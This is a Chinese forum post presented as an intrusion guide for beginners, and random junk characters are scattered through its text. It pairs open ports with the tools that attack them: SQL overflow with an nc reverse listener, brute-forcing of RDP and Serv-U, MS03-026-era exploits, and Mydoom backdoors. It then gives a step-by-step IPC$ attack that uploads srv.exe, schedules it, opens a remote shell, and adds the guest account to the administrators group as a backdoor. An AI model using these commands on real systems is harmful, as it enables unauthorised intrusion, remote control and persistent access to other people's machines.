TA的每日心情 | 衰 2019-8-18 09:37 |
|---|
签到天数: 2 天 [LV.1]初来乍到
|
来源:hi.baidu5 F. c% F4 g- D* I9 A, ~0 Z6 O; A
希望对新手入侵有帮助! ! G! l3 }1 ~, j
1. 1433端口入侵
9 K9 X# Q' y- F scanport.exe 查有1433的机器/ `; b$ p. g1 d& Z3 `7 F: l# K1 c8 H
SQLScanPass.exe 进行字典暴破(字典是关键)7 T9 @0 Z( F( G
最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。2 N% E+ `" h& M, b2 Y) C
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
$ s W3 T1 j: c (以上反向的,测试成功)$ b( _; S$ ]/ U9 A* W( J0 v- T6 B, J
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
" m9 P; J6 K/ `) T& c* j8 C 2. 4899端口入侵
2 S2 k4 e1 V/ D2 F$ T 用4899过滤器.exe,扫描空口令的机器
* a9 L' L! _. z: Q2 H8 \ 3. 3899的入侵) r3 u; S8 \0 F! q+ D& a
对很早的机器,可以试试3389的溢出(win3389ex.exe) X% W/ g# h: E8 P5 i- {
对2000的机器,可以试试字典暴破。(tscrack.exe)
/ b1 H4 z4 k" A: E' _ 4. 80入侵! o4 e* e, ]- j4 |% Q
对sp3以前的机器,可以用webdav入侵;
! D. ]% x& o" h2 T: [ 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)2 e$ @; e: z, d
可以利用SQL进行注入。(啊D的注入软件)。/ @2 c! @0 C4 ]9 J
5. serv-u入侵(21端口)
' ?3 ]9 U: A) _ 对5. 004及以下系统,可用溢出入侵。(serv5004.exe). `8 v& n4 L4 o6 @
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)& F( O4 Y; q4 d/ ~
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)7 }) y2 a# g7 Q8 M* p
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码9 h$ s6 `4 p$ I* k$ p( T% s; p
6. 554端口
' r. y6 c9 y! g) L% Y) o 用real554.exe入侵。
- q* K+ E+ m+ A {- g 7. 6129端口% T7 c! z7 \& ~
用DameWare6129.exe入侵。
! X* @% V( W$ a& H0 Z( } 8. 系统漏洞8 _. e: y' y, s7 z
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。
: ^9 S" ~6 T, V' M& o. z8 U5 u9. 3127等端口
; z W! v& X9 U( b- r: I3 e6 f9 v3 l+ S1 s; j
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
+ b$ a- Y( w+ W {$ p4 w2 i 10. 其他入侵' t( s- {$ `( a9 I2 M7 b
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
$ p1 X2 T7 k4 s" N8 w3 z/ ]# ], P7 B7 d( E, Z9 T& {
经典IPC$入侵
( f4 [$ v* a2 R7 q5 G0 }# ~, V+ f# |$ Z0 N
1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators"
, Y M+ U r; n" _4 o. j 这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。5 W" p5 J _5 Y+ o9 [9 t' v3 Z. V
2. C:\>copy srv.exe $">\\127.0.0.1\admin$/ u2 T X5 t$ w
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。- j- K; h5 }$ T
3. C:\>net time file://127.0.0.1/4 v; H, t& h0 R- }
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
+ S5 R8 r" H. C$ p" r" J6 N 4. C:\>at file://127.0.0.1/ 11:05 srv.exe% G, r9 E2 Z- v& g
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.
2 _0 }: U7 l! l& Q; I( S1 A+ ^ 5. C:\>net time file://127.0.0.1/
; t/ j! n1 @% y$ e& R2 _ 再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。$ v$ L. o8 x6 u& s' M$ X3 ~
6. C:\>telnet 127.0.0.1 99& D. F5 L6 G" L$ g* M. [; Z
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
5 Q9 A# M) D% Z) x! E- y 虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
* x# x9 C8 e0 x 7.C:\>copy ntlm.exe $">\\127.0.0.1\admin$
$ J! E. z) z% d( o% f( J" V/ M 用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。8 U+ i$ U; {: N7 W
8. C:\WINNT\system32>ntlm
4 a8 B# p0 @1 ?1 `: I* J/ ] 输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!: Q+ |7 w' i) i- U0 r" y& I0 s
9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组" b2 t# S% c* s: E7 o9 t3 ]/ i
10. C:\>net user guest /active:yes
1 X5 \6 k! n6 [& S) q 将对方的Guest用户激活
4 x# Z4 ?, Q$ }1 x1 J% e 11. C:\>net user guest 1234
$ Y+ I; v. |! g$ k4 Y4 w2 m 将Guest的密码改为1234,或者你要设定的密码
$ U+ d" w' ]8 [7 F& v 12. C:\>net localgroup administrators guest /add
9 `+ M1 U& U8 T) j( w2 r4 [% P 将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机) |
|